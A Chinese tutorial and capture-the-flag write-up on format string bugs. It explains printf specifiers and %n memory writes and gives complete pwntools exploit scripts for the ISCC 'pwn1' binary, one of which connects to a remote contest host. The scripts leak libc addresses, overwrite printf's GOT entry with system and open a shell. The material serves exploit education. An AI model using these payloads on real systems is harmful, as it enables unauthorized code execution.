格式化字符串利用小结
格式化字符串漏洞基本原理:
Printf()函数的一般形式为printf(“format”,输出表列),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。正常情况下,这样使用:
char str[100];
scanf(“%s”,str);
printf(“%s”,str);
但也有人这么用:
char str[100]
scanf(“%s”,str);
printf(str)
也许代码编写者的本意只是单纯打印一段字符(如“hello world”),但如果这段字符串来源于外部用户可控的输入,则该用户完全可以在字符串中嵌入格式化字符(如%s)。那么,由于printf允许参数个数不固定,故printf会自动将这段字符当作format参数,而用其后内存中的数据匹配format参数。
以上图为例,假设调用printf(str)时的栈是这样的:
(1)如果str就是“Hello word”,则直接输出“hello world”
(2)如果str是format,例如:%2$p,就会输出format偏移2处到内存地址的内容!
实例分析:
下面我们来通过ISCC pwn1的格式化字符从来进行分析:
首先看下文件
file pwn1 pwn1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs),
for GNU/Linux 2.6.24, BuildID[sha1]=cdb7eaa63202024dd348ac15b485b751b55eafa8, not stripped
运行下程序:
查看下保护机制:
发现只有NX保护机制。
看下反编译的源码:
发现漏洞在printf输出的地方。测试下:
果然出现了打印地址的情况,说明存在格式户字符串漏洞。
我们来调试熟悉格式化字符串的利用:
%c:输出字符,配上%n可用于向指定地址写数据。
%d:输出十进制整数,配上%n可用于向指定地址写数据。
%x:输出16进制数据,如%i$x表示要泄漏偏移i处4字节长的16进制数据,%i$lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。
%p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bit下输出8字节,可通过输出字节的长度来判断目标环境是32bit还是64bit。
%s:输出的内容是字符串,即将偏移处指针指向的字符串输出,如%i$s表示输出偏移i处地址所指向的字符串,在32bit和64bit环境下一样,可用于读取GOT表等信息。
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100x%10$n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而%$hn表示写入的地址空间为2字节,%$hhn表示写入的地址空间为1字节,%$lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过%$hn或%$hhn来适时调整。
%n是通过格式化字符串漏洞改变程序流程的关键方式,而其他格式化字符串参数可用于读取信息或配合%n写数据。
1、%x打印内存数据
首先在printf处下一个断点:
运行输入%x:
程序段在了我们的断点处。C继续运行
发现程序打印出了,format偏移1处的内存中的内容。
现在我们输入%5$x 看打印的内容是不是:0x1
果然输出了我们想要预设的偏移为5的数据,即为1.
2、%p打印内存数据
%p的用法和%x的用法相同,不同的是%p会在打印的数据前面添加上0x(输出16进制数据)。例如%5$p
然后试一下偏移四处的栈数据即我们预测的0xaffd014.输入%4$p,看效果。可以发现打印的是带有0x的数据内容,即十六进制数据。
3、%s打印内存数据
%i&s是打印处偏移i处地址里面数据指向的内存地址的内容。例如我们通过%3$s以字符串格式打印偏移3处的内容,就是0xffffd074指向的内容,即为0xffffd26c,下面我们看效果。
会发现打印的是L***为什么不是0xffffd26c呢?别急,看下转码。
内存小端存储,是以 6c d2 ff ff 形式存储,打印的就是0xffffd26c转换为字符串之后的形式。
4、%n写入内存数据
%n和%s类似,会把%好之前的字符个数,写入第i处数据指向的地址空间,我们实验下AAA%3$n,看看会不会把3写入到0xffffd074指向的内存,即覆盖0xffffd26c.
会看到,我们成功将3写入了0xffffd074指向的数据。这样我们就能够利用这一点来修改got表的地址了。
如果要写入具体的数据可以通过%datax%n$n,例如要写入数据0x48到偏移删除的位置,可以用%72x%3$n.(72是0x48的十进制数据。)
调试看效果:
可以发现偏移三处的位置,0xffffd074指向的数据被我们修改为了0x48('H').
后面我们会结合实际的例题来完整的实例脚本。
还是这道题pwn1,刚刚我们对格式化字符串的参数利用方法,下面就是利用方式了。先看脚本:
32位:
1 from pwn import* 2 3 local =1 4 debug = 1 5 6 if local: 7 p = process('./pwn1') 8 else: 9 p = remote("127.0.0.1",8080) 10 11 #context.log_level = 'debug' 12 ''' 13 if debug: 14 gdb.attach(p) 15 ''' 16 def fms(data): 17 p.recvuntil("input$",timeout=4) 18 p.sendline("1") 19 p.recvuntil("please input your name:\n") 20 p.sendline(data) 21 22 23 libc = ELF("/lib/i386-linux-gnu/libc.so.6") 24 elf = ELF('./pwn1') 25 26 fms('%35$p') 27 28 libc_start_main_addr = int(p.recv(10),16) - 243 #__libc_start_main 29 libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main'] 30 print "libc_addr =",hex(libc_addr) 31 32 printf_got = elf.got['printf'] 33 print "printf_got =",hex(printf_got) 34 35 system_addr =libc_addr + libc.symbols['system'] 36 print "system_addr =",hex(system_addr) 37 38 #make stack 39 make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1) 40 fms(make_stack) 41 #gdb.attach(p) 42 43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn" 44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" 45 print "payload=",payload 46 47 fms(payload) 48 fms('/bin/sh\x00') 49 p.interactive()
看下这条语句:
make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1)
目的是抬高栈:防止写入的数据被程序执行过程中被覆盖,语句如下,0x30这个数值可以自己定义。剩下的工作就是调试寻找偏移地址了。
利用思路:
1、泄露地址:__libc_start_main —>libc_addr
2、修改printf的got表内的地址为system函数的地址。
3、通过源程序中的printf(/bin/sh),就变成了system(/bin/sh),取得了shell了。
64位:
from pwn import* local =0 debug = 0 if local: p = process('./pwn1') else: p = remote("101.71.29.5",10040) context_log_level = 'debug' if debug: gdb.attach(p) def fms(data): p.sendline(data) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") elf = ELF('./pwn1') fms('%43$p') libc_start_main_addr = int(p.recv(20),16) - 240 print "libc_start_main_addr =",hex(libc_start_main_addr) libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main'] print "libc_addr =",hex(libc_addr) printf_got = elf.got['printf'] print "printf_got =",hex(printf_got) system_addr =libc_addr + libc.symbols['system'] #system_addr = 0x12345678 print "system_addr =",hex(system_addr) make_stack = 'A' * 0x50 + p64(printf_got) + p64(printf_got + 0x1) fms(make_stack) payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn" payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" print "payload=",payload #gdb.attach(p,open('bb')) fms(payload) fms('/bin/sh\x00') p.interactive()
参考链接:http://bobao.360.cn/learning/detail/3654.html